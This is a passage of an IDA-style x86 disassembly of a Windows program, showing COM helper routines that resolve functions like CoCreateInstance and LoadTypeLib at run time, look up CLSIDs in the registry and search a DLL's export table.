; ---------------------------------------------------------------------------
loc_509511: ; CODE XREF: sub_5093B3+29�j
mov eax, 80004005h
locret_509516: ; CODE XREF: sub_5093B3+3C�j
; sub_5093B3+15C�j
leave
retn
sub_5093B3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509518 proc near ; DATA XREF: _7:off_5113E0�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E578
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
and [ebp+var_2C], 0
xor eax, eax
lea edi, [ebp+var_28]
stosd
stosd
mov eax, [ebp+arg_C]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
lea eax, [ebp+var_2C]
push eax
push 1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_5093B3
add esp, 1Ch
test eax, eax
jl short loc_50959A
mov eax, [ebp+arg_10]
mov ecx, [ebp+var_28]
mov [eax], ecx
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_509627
; ---------------------------------------------------------------------------
loc_50959A: ; CODE XREF: sub_509518+5D�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_5095D6
push [ebp+arg_0]
call sub_509638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_5095D6
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_511718 ; GetModuleHandleA
test eax, eax
jnz short loc_5095D6
push 8
push 0
push [ebp+var_1C]
call sub_50AE96
loc_5095D6: ; CODE XREF: sub_509518+8A�j
; sub_509518+9C�j ...
and [ebp+var_20], 0
push offset dword_50E5DC
push offset aCocreateinstan ; "CoCreateInstance"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_509627
; ---------------------------------------------------------------------------
loc_509615: ; DATA XREF: _6:0050E580�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_509627: ; CODE XREF: sub_509518+7D�j
; sub_509518+FB�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_509518 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509638 proc near ; CODE XREF: sub_509518+8F�p
; sub_509789+8F�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 005096A2 SIZE 0000007A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E588
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
push offset dword_516098
call ds:dword_5116C4 ; RtlEnterCriticalSection
and [ebp+var_4], 0
cmp ds:dword_5160B0, 0
jnz short loc_50968B
push offset aAdvapi32_dll_0 ; "ADVAPI32.DLL"
push offset aRegqueryvaluea ; "RegQueryValueA"
call sub_509C22
pop ecx
pop ecx
mov ds:dword_5160B0, eax
loc_50968B: ; CODE XREF: sub_509638+3B�j
or [ebp+var_4], 0FFFFFFFFh
call sub_509696
jmp short loc_5096A2
sub_509638 endp
; =============== S U B R O U T I N E =======================================
sub_509696 proc near ; CODE XREF: sub_509638+57�p
; DATA XREF: _6:0050E590�o
push offset dword_516098
call ds:dword_511754 ; RtlLeaveCriticalSection
retn
sub_509696 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_509638
loc_5096A2: ; CODE XREF: sub_509638+5C�j
push 401h
call sub_50835A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_1C], eax
mov [ebp+var_20], 400h
mov ecx, [ebp+var_20]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push [ebp+arg_0]
call sub_50971C
pop ecx
lea eax, [ebp+var_20]
push eax
push [ebp+var_1C]
push offset dword_515F98
push 80000000h
call ds:dword_5160B0
test eax, eax
jnz short loc_5096FC
mov eax, [ebp+var_1C]
jmp short loc_50970D
; ---------------------------------------------------------------------------
loc_5096FC: ; CODE XREF: sub_509638+BD�j
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_5083DD
pop ecx
xor eax, eax
loc_50970D: ; CODE XREF: sub_509638+C2�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_509638
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_50971C proc near ; CODE XREF: sub_509638+9E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Fh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Eh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Dh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ch]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Bh]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+0Ah]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+9]
push eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+8]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+6]
push eax
mov eax, [ebp+arg_0]
movzx eax, word ptr [eax+4]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
push offset aClsid08x04x04x ; "CLSID\\{%08x-%04x-%04x-%02x%02x-%02x%02x"...
push offset dword_515F98
call ds:dword_5117D4 ; wsprintfA
add esp, 34h
pop ebp
retn
sub_50971C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509789 proc near ; DATA XREF: _7:005113E8�o
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E598
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 24h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_2C]
push eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_5093B3
add esp, 1Ch
test eax, eax
jl short loc_5097F3
push 0FFFFFFFFh
mov eax, [ebp+var_2C]
mov [ebp+var_38], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_38]
jmp loc_5098AF
; ---------------------------------------------------------------------------
loc_5097F3: ; CODE XREF: sub_509789+4D�j
and [ebp+var_20], 0
push offset dword_50E5DC
push offset aCocreateinst_0 ; "CoCreateInstanceEx"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_509847
push [ebp+arg_0]
call sub_509638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_509847
mov [ebp+arg_8], 1
push [ebp+var_1C]
call ds:dword_511718 ; GetModuleHandleA
test eax, eax
jnz short loc_509847
push 8
push 0
push [ebp+var_1C]
call sub_50AE96
loc_509847: ; CODE XREF: sub_509789+8A�j
; sub_509789+9C�j ...
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
mov [ebp+var_24], eax
and [ebp+var_28], 0
jmp short loc_50986C
; ---------------------------------------------------------------------------
loc_509865: ; CODE XREF: sub_509789+FA�j
mov eax, [ebp+var_28]
inc eax
mov [ebp+var_28], eax
loc_50986C: ; CODE XREF: sub_509789+DA�j
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_10]
jnb short loc_509885
mov eax, [ebp+var_28]
imul eax, 0Ch
mov ecx, [ebp+arg_14]
mov eax, [ecx+eax]
mov [ebp+var_30], eax
jmp short loc_509865
; ---------------------------------------------------------------------------
loc_509885: ; CODE XREF: sub_509789+E9�j
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_3C], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_3C]
jmp short loc_5098AF
; ---------------------------------------------------------------------------
loc_50989D: ; DATA XREF: _6:0050E5A0�o
mov eax, [ebp+var_1C]
mov [ebp+var_34], eax
push [ebp+var_34]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_5098AF: ; CODE XREF: sub_509789+65�j
; sub_509789+112�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
sub_509789 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5098C0 proc near ; DATA XREF: _7:005113F0�o
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_50E5A8
push offset sub_4FC54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
lea eax, [ebp+var_24]
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_50931F
add esp, 18h
test eax, eax
jl short loc_509927
push 0FFFFFFFFh
mov eax, [ebp+var_24]
mov [ebp+var_2C], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_2C]
jmp loc_5099B4
; ---------------------------------------------------------------------------
loc_509927: ; CODE XREF: sub_5098C0+4A�j
mov eax, [ebp+arg_4]
and eax, 1
test eax, eax
jz short loc_509963
push [ebp+arg_0]
call sub_509638
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_509963
mov [ebp+arg_4], 1
push [ebp+var_1C]
call ds:dword_511718 ; GetModuleHandleA
test eax, eax
jnz short loc_509963
push 8
push 0
push [ebp+var_1C]
call sub_50AE96
loc_509963: ; CODE XREF: sub_5098C0+6F�j
; sub_5098C0+81�j ...
and [ebp+var_20], 0
push offset dword_50E5DC
push offset aCogetclassobje ; "CoGetClassObject"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_20], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_20]
push 0FFFFFFFFh
mov [ebp+var_30], eax
lea eax, [ebp+var_10]
push eax
call sub_4FC496
pop ecx
pop ecx
mov eax, [ebp+var_30]
jmp short loc_5099B4
; ---------------------------------------------------------------------------
loc_5099A2: ; DATA XREF: _6:0050E5B0�o
mov eax, [ebp+var_1C]
mov [ebp+var_28], eax
push [ebp+var_28]
call sub_5083DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_5099B4: ; CODE XREF: sub_5098C0+62�j
; sub_5098C0+E0�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 14h
sub_5098C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_5099C5 proc near ; CODE XREF: sub_509A34+9F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_8], 80070057h
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
mov eax, [ebp+arg_0]
mov eax, [eax]
push [ebp+arg_0]
call dword ptr [eax+18h]
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jl short loc_509A2F
and [ebp+var_C], 0
push offset dword_50E5F8
push offset aGetrecordinfof ; "GetRecordInfoFromTypeInfo"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_509A28
push [ebp+arg_8]
push [ebp+var_4]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_4]
mov eax, [eax]
push [ebp+var_4]
call dword ptr [eax+8]
jmp short loc_509A2F
; ---------------------------------------------------------------------------
loc_509A28: ; CODE XREF: sub_5099C5+48�j
mov [ebp+var_8], 80004005h
loc_509A2F: ; CODE XREF: sub_5099C5+2A�j
; sub_5099C5+61�j
mov eax, [ebp+var_8]
leave
retn
sub_5099C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509A34 proc near ; DATA XREF: _7:off_5113F8�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 24h
push edi
mov [ebp+var_4], 80004005h
push [ebp+arg_0]
call sub_502D50
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz loc_509AFD
and [ebp+var_10], 0
mov edi, [ebp+var_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_18], ecx
push 208h
call sub_50835A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_14], eax
mov ecx, 82h
xor eax, eax
mov edi, [ebp+var_14]
rep stosd
push 104h
push [ebp+var_14]
push 0FFFFFFFFh
push [ebp+var_8]
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
push offset dword_50E5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
push [ebp+var_14]
call [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jl short loc_509AE9
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+var_10]
call sub_5099C5
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+var_10]
mov eax, [eax]
push [ebp+var_10]
call dword ptr [eax+8]
loc_509AE9: ; CODE XREF: sub_509A34+94�j
mov eax, [ebp+var_14]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_5083DD
pop ecx
mov eax, [ebp+var_4]
jmp short loc_509B37
; ---------------------------------------------------------------------------
loc_509AFD: ; CODE XREF: sub_509A34+1E�j
and [ebp+var_1C], 0
push offset dword_50E5F8
push offset aGetrecordinf_0 ; "GetRecordInfoFromGuids"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_509B32
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_1C]
jmp short loc_509B37
; ---------------------------------------------------------------------------
loc_509B32: ; CODE XREF: sub_509A34+E5�j
mov eax, 80004005h
loc_509B37: ; CODE XREF: sub_509A34+C7�j
; sub_509A34+FC�j
pop edi
leave
retn 18h
sub_509A34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509B3C proc near ; DATA XREF: _7:00511400�o
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_8], 80004005h
push [ebp+arg_0]
call sub_502D50
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_509BB5
push 208h
call sub_50835A
pop ecx
mov [ebp+var_18], eax
mov eax, [ebp+var_18]
mov [ebp+var_10], eax
push 104h
push [ebp+var_10]
push 0FFFFFFFFh
push [ebp+var_4]
push 0
push 0
call ds:dword_511770 ; MultiByteToWideChar
push offset dword_50E5F8
push offset aLoadtypelib ; "LoadTypeLib"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_C], eax
push [ebp+arg_10]
push [ebp+var_10]
call [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
mov [ebp+var_1C], eax
push [ebp+var_1C]
call sub_5083DD
pop ecx
loc_509BB5: ; CODE XREF: sub_509B3C+1D�j
cmp [ebp+var_8], 0
jge short loc_509BE4
push offset dword_50E5F8
push offset aLoadregtypelib ; "LoadRegTypeLib"
call sub_509C22
pop ecx
pop ecx
mov [ebp+var_14], eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_14]
mov [ebp+var_8], eax
loc_509BE4: ; CODE XREF: sub_509B3C+7D�j
mov eax, [ebp+var_8]
leave
retn 14h
sub_509B3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509BEB proc near ; CODE XREF: sub_509C22+A�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push [ebp+arg_4]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_509C0E
push [ebp+arg_4]
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_8], eax
loc_509C0E: ; CODE XREF: sub_509BEB+15�j
push [ebp+arg_0]
push [ebp+var_8]
call ds:dword_511728 ; GetProcAddress
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_509BEB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509C22 proc near ; CODE XREF: sub_5058A0+16�p
; sub_509518+CC�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push [ebp+arg_4]
push [ebp+arg_0]
call sub_509BEB
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_509C4F
push ds:off_50E4F8
push 30h
push ds:off_50E4FC
call sub_50848C
loc_509C4F: ; CODE XREF: sub_509C22+18�j
mov eax, [ebp+var_4]
leave
retn
sub_509C22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509C54 proc near ; CODE XREF: sub_432F40+8�p
; sub_432F60+9�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp [ebp+arg_0], 0
jnz short loc_509C64
mov [ebp+arg_0], offset sub_508C27
loc_509C64: ; CODE XREF: sub_509C54+7�j
movzx eax, ds:byte_5160D0
test eax, eax
jnz short loc_509C7A
push [ebp+arg_0]
call ds:dword_511790 ; SetUnhandledExceptionFilter
jmp short loc_509C8A
; ---------------------------------------------------------------------------
loc_509C7A: ; CODE XREF: sub_509C54+19�j
push offset sub_508C27
call ds:dword_511790 ; SetUnhandledExceptionFilter
mov eax, offset sub_508C27
loc_509C8A: ; CODE XREF: sub_509C54+24�j
pop ebp
retn 4
sub_509C54 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509C8E proc near ; CODE XREF: sub_509D79+4B�p
; sub_509F43+108�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
and [ebp+var_8], 0
mov eax, [ebp+arg_4]
mov eax, [eax+18h]
dec eax
mov [ebp+var_4], eax
loc_509CA2: ; CODE XREF: sub_509C8E:loc_509D70�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_4]
jg loc_509D75
mov eax, [ebp+var_8]
add eax, [ebp+var_4]
cdq
sub eax, edx
sar eax, 1
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+20h]
mov eax, [ebp+var_10]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_8]
mov [ebp+var_20], eax
loc_509CD7: ; CODE XREF: sub_509C8E+7B�j
mov eax, [ebp+var_20]
mov al, [eax]
mov [ebp+var_21], al
mov ecx, [ebp+var_1C]
cmp al, [ecx]
jnz short loc_509D11
cmp [ebp+var_21], 0
jz short loc_509D0B
mov eax, [ebp+var_20]
mov al, [eax+1]
mov [ebp+var_22], al
mov ecx, [ebp+var_1C]
cmp al, [ecx+1]
jnz short loc_509D11
add [ebp+var_20], 2
add [ebp+var_1C], 2
cmp [ebp+var_22], 0
jnz short loc_509CD7
loc_509D0B: ; CODE XREF: sub_509C8E+5C�j
and [ebp+var_28], 0
jmp short loc_509D19
; ---------------------------------------------------------------------------
loc_509D11: ; CODE XREF: sub_509C8E+56�j
; sub_509C8E+6D�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
mov [ebp+var_28], eax
loc_509D19: ; CODE XREF: sub_509C8E+81�j
mov eax, [ebp+var_28]
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_509D5A
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+24h]
mov eax, [ebp+var_10]
mov ax, [ecx+eax*2]
mov [ebp+var_18], ax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_0]
add ecx, [eax+1Ch]
movzx eax, [ebp+var_18]
mov eax, [ecx+eax*4]
add eax, [ebp+arg_0]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
jmp short locret_509D77
; ---------------------------------------------------------------------------
loc_509D5A: ; CODE XREF: sub_509C8E+9B�j
cmp [ebp+var_C], 0
jle short loc_509D69
mov eax, [ebp+var_10]
inc eax
mov [ebp+var_8], eax
jmp short loc_509D70
; ---------------------------------------------------------------------------
loc_509D69: ; CODE XREF: sub_509C8E+D0�j
mov eax, [ebp+var_10]
dec eax
mov [ebp+var_4], eax
loc_509D70: ; CODE XREF: sub_509C8E+D9�j
jmp loc_509CA2
; ---------------------------------------------------------------------------
loc_509D75: ; CODE XREF: sub_509C8E+1A�j
xor eax, eax
locret_509D77: ; CODE XREF: sub_509C8E+CA�j
leave
retn
sub_509C8E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509D79 proc near ; CODE XREF: sub_507494+97�p
; sub_507494+C5�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
push [ebp+arg_4]
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jnz short loc_509D9D
push [ebp+arg_4]
call ds:dword_51175C ; LoadLibraryA
mov [ebp+var_14], eax
loc_509D9D: ; CODE XREF: sub_509D79+16�j
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+var_C]
add ecx, [eax+3Ch]
mov [ebp+var_10], ecx
mov eax, [ebp+var_10]
mov ecx, [ebp+var_C]
add ecx, [eax+78h]
mov [ebp+var_4], ecx
push [ebp+arg_0]
push [ebp+var_4]
push [ebp+var_C]
call sub_509C8E
add esp, 0Ch
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
leave
retn
sub_509D79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509DD4 proc near ; CODE XREF: sub_504DC0+12�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 2Ch
push offset dword_5160B8
call ds:dword_51174C ; InitializeCriticalSection
push offset dword_516098
call ds:dword_51174C ; InitializeCriticalSection
push 28h
call sub_50835A
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_509E13
push 83h
mov ecx, [ebp+var_8]
call sub_50B77C
mov [ebp+var_1C], eax
jmp short loc_509E17
; ---------------------------------------------------------------------------
loc_509E13: ; CODE XREF: sub_509DD4+2B�j
and [ebp+var_1C], 0
loc_509E17: ; CODE XREF: sub_509DD4+3D�j
mov eax, [ebp+var_1C]
mov ds:dword_5160D4, eax
push 28h
call sub_50835A
pop ecx
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jz short loc_509E3F
push 9
mov ecx, [ebp+var_C]
call sub_50B77C
mov [ebp+var_20], eax
jmp short loc_509E43
; ---------------------------------------------------------------------------
loc_509E3F: ; CODE XREF: sub_509DD4+5A�j
and [ebp+var_20], 0
loc_509E43: ; CODE XREF: sub_509DD4+69�j
mov eax, [ebp+var_20]
mov ds:dword_5160D8, eax
push 28h
call sub_50835A
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_509E6B
push 9
mov ecx, [ebp+var_10]
call sub_50B77C
mov [ebp+var_24], eax
jmp short loc_509E6F
; ---------------------------------------------------------------------------
loc_509E6B: ; CODE XREF: sub_509DD4+86�j
and [ebp+var_24], 0
loc_509E6F: ; CODE XREF: sub_509DD4+95�j
mov eax, [ebp+var_24]
mov ds:dword_51194C, eax
push 28h
call sub_50835A
pop ecx
mov [ebp+var_14], eax
cmp [ebp+var_14], 0
jz short loc_509E97
push 9
mov ecx, [ebp+var_14]
call sub_50B77C
mov [ebp+var_28], eax
jmp short loc_509E9B
; ---------------------------------------------------------------------------
loc_509E97: ; CODE XREF: sub_509DD4+B2�j
and [ebp+var_28], 0
loc_509E9B: ; CODE XREF: sub_509DD4+C1�j
mov eax, [ebp+var_28]
mov ds:dword_511954, eax
push 28h
call sub_50835A
pop ecx
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jz short loc_509EC3
push 9
mov ecx, [ebp+var_18]
call sub_50B77C
mov [ebp+var_2C], eax
jmp short loc_509EC7
; ---------------------------------------------------------------------------
loc_509EC3: ; CODE XREF: sub_509DD4+DE�j
and [ebp+var_2C], 0
loc_509EC7: ; CODE XREF: sub_509DD4+ED�j
mov eax, [ebp+var_2C]
mov ds:dword_511950, eax
push offset dword_50E5B4
push 2Fh
push offset off_511250
call sub_509F43
add esp, 0Ch
push offset dword_50E5C4
push 2
push offset off_5113C8
call sub_509F43
add esp, 0Ch
push offset dword_50E5D0
push 1
push offset off_5113D8
call sub_509F43
add esp, 0Ch
push offset dword_50E5DC
push 3
push offset off_5113E0
call sub_509F43
add esp, 0Ch
push offset dword_50E5F8
push 2
push offset off_5113F8
call sub_509F43
add esp, 0Ch
push offset dword_50E5B4
call ds:dword_511718 ; GetModuleHandleA
mov [ebp+var_4], eax
leave
retn
sub_509DD4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_509F43 proc near ; CODE XREF: sub_509DD4+107�p
; sub_509DD4+11B�p ...
